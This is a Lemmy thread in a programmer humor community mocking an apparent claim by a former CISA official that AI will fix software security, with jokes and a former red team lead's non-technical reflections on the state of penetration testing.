this post was submitted on 27 Oct 2025
322 points (99.7% liked)

Programmer Humor

27082 readers
1184 users here now

Welcome to Programmer Humor!

This is a place where you can post jokes, memes, humor, etc. related to programming!

For sharing awful code theres also Programming Horror.

Rules

founded 2 years ago
MODERATORS
top 50 comments
sorted by: hot top controversial new old
[–] IzzyScissor@lemmy.world 2 points 15 minutes ago

SchrΓΆdinger's AI: It's so smart it can build perfect security, but it's too dumb to figure out how to break it.

[–] Blackmist@feddit.uk 7 points 1 hour ago

Ron Howard narrator: Actually, they would need more.

The look on her face in the thumbnail matches the title perfectly.

[–] Routhinator@startrek.website 29 points 6 hours ago

AI is opening so many security HOLES. Its not solving shit. AI browsers and MCP connectors are wild west security nightmares. And that's before you even trust any code these things write.

[–] DupaCycki@lemmy.world 30 points 8 hours ago

At this point, they're just rage baiting and saying random shit to squeeze that bubble before it bursts.

[–] Itdidnttrickledown@lemmy.world 5 points 6 hours ago (1 children)

AI might pull her head our of her ass... eventually.

[–] Reginald_T_Biter@lemmy.world 1 points 1 minute ago

At this point we need to pull their heads out of our asses

[–] MashedTech@lemmy.world 3 points 5 hours ago

Who is paying her?

[–] Mikina@programming.dev 23 points 10 hours ago* (last edited 10 hours ago) (1 children)

I have worked as a pentester and eventually a Red Team lead before leaving foe gamedev, and oh god this is so horrifiying to read.

The state of the industry was alredy extremely depressing, which is why I left. Even without all of this AI craze, the fact that I was able to get from a junior to Red Team Lead, in a corporation with hundreds of employees, in a span of 4 years is already fucked up, solely because Red Teaming was starting to be a buzz word, and I had passion for the field and for Shadowrun while also being good at presentations that customers liked.

When I got into the team, the "inhouse custom malware" was a web server with a script that pools it for commands to run with cmd.exe. It had a pretty involved custom obfuscation, but it took me lile two engagements and the guy responsible for it to leave before I even (during my own research) found out that WinAPI is a thing, and that you actually should run stuff from memory and why. And I was just a junior at the time, and this "revelation" got me eventually a unofficial RT Lead position, with 2 MDs per month for learning and internal development, rest had to be on engagements.

And even then, we were able to do kind of OK in engagements, because the customers didn't know and also didn't care. I was always able to come up with "lessons learned", and we always found out some glaring sec policy issues, even with limited tools, but the thing is - they still did not care. We reported something, and two years ago they still had the same bruteforcable kerberos tickets. It already felt like the industry is just a scam done for appearances, and if it's now just AIs talking to the AIs then, well, I don't think much would change.

But it sucks. I love offensive security, it was really interresting few years of my carreer, but ot was so sad to do, if you wanted to do it well :(

[–] Jocker@sh.itjust.works 3 points 7 hours ago (1 children)

Seeing all these AI ideas, i think security is about to get hugely more important in the near future.

[–] Mikina@programming.dev 3 points 3 hours ago

Definitely, but the issue is that even the security companies that actually do the assesments also seem to be heavily transitioning towards AI.

To be fair, in some cases, ML is actually really good (i.e in EDRs. Bypassing a ML-trained EDR is really annoying, since you can't easily see what was it that triggered the detection, and that's good), and that will carry most of the prevention and compensate for the vulnerable and buggy software. A good EDR and WAF can stop a lot. That is, assuming you can afford such an EDR, AV won't do shit - but unless we get another Wannacry, no-one cares that a few dozen of people got hacked through random game/app, "it's probably their fault for installing random crap anyway".

I've also already seen a lot of people either writing reports with, or building whole tools that run "agentic penetration tests". So, instead of a Nessus scan, or an actual Red Teamer building a scenario themselves, you get a LLM to write and decide a random course of action, and they just trust the results.

Most of the cybersecurity SaaS corporates didn't care about the quality of the work before, just like the companies that are actually getting the services didn't care (but had to check a checkbox). There's not really an incentive for them to do so, worst case you get into a finger-pointing scenario ("We did have it pentested" -> "But our contract says that we can't 100% find everything, and this wasn't found because XYZ... Here's a report with our methodology that we did everything right"), or the modern equivalent of "It was the AI's fault", maybe get a slap on the wrist, but I think that it will not get more important, but way, way more depressing than it already was three years ago.

I'd estimate it will take around a decade of unusable software and dozens of extremely major security breaches before any of the large corporations (on any side) concedes that AI was really, really stupid idea. And at that time they'll probably also realize that they can just get away with buggy vulnerable software and not care, since breaches will be pretty common place, and probably won't affect larger companies with good (and expensive) frontline mitigation tools.

[–] itkovian@lemmy.world 53 points 13 hours ago

Execs and managers showing Dunning-Kruger in full effect.

[–] onlinepersona@programming.dev 27 points 13 hours ago (3 children)

I tried using AI in my rust project and gave up on letting it write code. It does quite alright in python, but rust is still too niche for it. Imagine trying to write zig or Haskell, it would make a terrible mess of it.

Security is an afterthought in 99.99% of code. AI barely has anything to learn from.

[–] funkless_eck@sh.itjust.works 2 points 6 hours ago

Even in Python you have to keep it siloed. You have to drip feed it pieces because if you give it the whole script it'll eat comments, straight up chop out pieces so you end up with something like

 def myFunction():
      # ...start of your function here...

replacing actual code.

[–] buddascrayon@lemmy.world 4 points 8 hours ago

It does quite alright in python

That's cause python is the most forgiving language you could write in. You could drop entire pages of garbage into a script and it would figure out a way to run properly.

[–] krooklochurm@lemmy.ca 28 points 13 hours ago (2 children)

If you're using Hannah Montana Linux you can just open a terminal and type "write me ____ in the language ____" and the Hannai Montanai will produce perfectly working code every time.

[–] jaybone@lemmy.zip 11 points 12 hours ago (1 children)
[–] krooklochurm@lemmy.ca 13 points 12 hours ago

Hannah Montana Linux is serious business. I would never joke about Hannah Montana Linux.

[–] Archer@lemmy.world 5 points 12 hours ago

If this isn’t real then someone is going to make it

[–] deadbeef79000@lemmy.nz 25 points 14 hours ago

Ha ha ha ha ha!

Oh wait, you're serious. Let me laugh even harder.

HA HA HA HA HA!

[–] HazardousBanjo@lemmy.world 31 points 15 hours ago

As usual, the biggest advocates for AI are the ones who understand its limitations the least.

[–] TheReturnOfPEB@reddthat.com 151 points 20 hours ago (4 children)

couldn't ai, then also, break code faster than we could fix it ?

[–] PattyMcB@lemmy.world 14 points 16 hours ago (1 children)

AI WRITES broken code. Exploiting is is even easier.

[–] MajorasTerribleFate@lemmy.zip 5 points 13 hours ago (1 children)

How do you exploit that which is too broken to run?

[–] anomnom@sh.itjust.works 1 points 1 hour ago

Self-exploiting code.

[–] NuXCOM_90Percent@lemmy.zip 35 points 20 hours ago* (last edited 20 hours ago) (3 children)

I mean, at a high level it is very much the concept of ICE from Gibson et al back in the day.

Intrusion Countermeasures Electronics. The idea that you have code that is constantly changing and updating based upon external stimuli. A particularly talented hacker, or AI, can potentially bypass it but it is a very system/mental intensive process and the stronger the ICE, the stronger the tools need to be.

In the context of AI on both sides? Higher quality models backed by big ass expensive rigs on one side should work for anything short of a state level actor... if your models are good (big ol' "if" that).

Which then gets into the idea of Black ICE that is actively antagonistic towards those who are detected as attempting to bypass it. In the books it would fry brains. In the modern day it isn't overly dissimilar from how so many VPN controlled IPs are just outright blocked from services and there is always the risk of getting banned because your wifi coffee maker is part of a botnet.

But it is also not hard to imagine a world where a counter-DDOS or hack is run. Or a message is sent to the guy in the basement of the datacenter to go unplug that rack and provide the contact information of whoever was using it.

load more comments (3 replies)
load more comments (2 replies)
[–] buttnugget@lemmy.world 4 points 11 hours ago

The one thing I will agree with is that If you ignore the AI part and just focus on the idea of having good software that can find code vulnerabilities, that’s a good idea.

[–] jaybone@lemmy.zip 12 points 14 hours ago

Fix what code? The code it broke or wrote like shit in the first place?

[–] 30p87@feddit.org 81 points 20 hours ago* (last edited 20 hours ago) (5 children)

Genius strategy:

  • Replace Juniors
  • Old nerds knowing stuff die out
  • Now nobody knows anything about programming and security
  • Everything's now a battle between LLMs
[–] OctopusNemeses@lemmy.world 3 points 8 hours ago

This is a generalized problem. It's not only programming. The world faces a critical collapse of expertise if we defer to AI.

[–] jaybone@lemmy.zip 18 points 14 hours ago (1 children)

I’ve already had to reverse engineer shitty old spaghetti code written by people who didn’t know what they were doing, so I could fix obscure bugs.

I can wait until I have to do the same thing for AI generated code.

[–] 30p87@feddit.org 3 points 13 hours ago

Just apply for any top company, especially Shit Valley. They'll 100% use GenML.

[–] jaybone@lemmy.zip 4 points 14 hours ago

I’ve already had to reverse engineer shitty old spaghetti code written by people who didn’t know what they were doing, so I could fix obscure bugs.

I can wait until I have to do the same thing for AI generated code.

[–] MelodiousFunk@slrpnk.net 12 points 19 hours ago

If it's good enough for COBOL...

[–] bleistift2@sopuli.xyz 65 points 20 hours ago (2 children)

The current administration believes the same stuff. She left with the admin change yet agrees with things like the current admin’s approach to AI regulation.

[–] Susaga@sh.itjust.works 20 points 20 hours ago (1 children)

I wonder why they don't work there anymore...

[–] i_stole_ur_taco@lemmy.ca 8 points 16 hours ago (1 children)

Replaced by AI, ironically.

load more comments (1 replies)
[–] kn0wmad1c@programming.dev 13 points 15 hours ago

Clearly she's never seen AI code.

[–] violentfart@lemmy.world 31 points 19 hours ago
[–] melfie@lemy.lol 18 points 18 hours ago
[–] Aeri@lemmy.world 5 points 14 hours ago

Based on my understanding of programming I think they're going to need an extra couple people on the security team because of the Ai's "fixes"

[–] PattyMcB@lemmy.world 9 points 16 hours ago (1 children)
load more comments (1 replies)
[–] Bennyboybumberchums@lemmy.world 5 points 14 hours ago (1 children)

I just asked an AI what the minimum wage was in 2003 in the UK and it told me that it was Β£4.50 and that on a 40 hour work week, that came out to 18k a year... But sure, trust it to write and fix code...

[–] MajorasTerribleFate@lemmy.zip 3 points 13 hours ago

The UK doesn't have 100 weeks in its year? No wonder y'all lost the Empire.

[–] rozodru@pie.andmc.ca 19 points 20 hours ago

Not with any of the current models, none of them are concerned with security or scaling.

[–] death_to_carrots@feddit.org 14 points 19 hours ago (3 children)

It takes a good person with ~~a gun~~ AI to stop a bad person with ~~a gun~~ AI.

load more comments (3 replies)
[–] Darkcoffee@sh.itjust.works 13 points 19 hours ago

Is that why she's Ex-CISA? 🀣

[–] tidderuuf@lemmy.world 16 points 20 hours ago

Ah yes, I'm sure AI just patched that software so that other AI could use that patched software and make things so much more secure. What a brilliant idea from an Ex-CISA head.

load more comments
view more: next β€Ί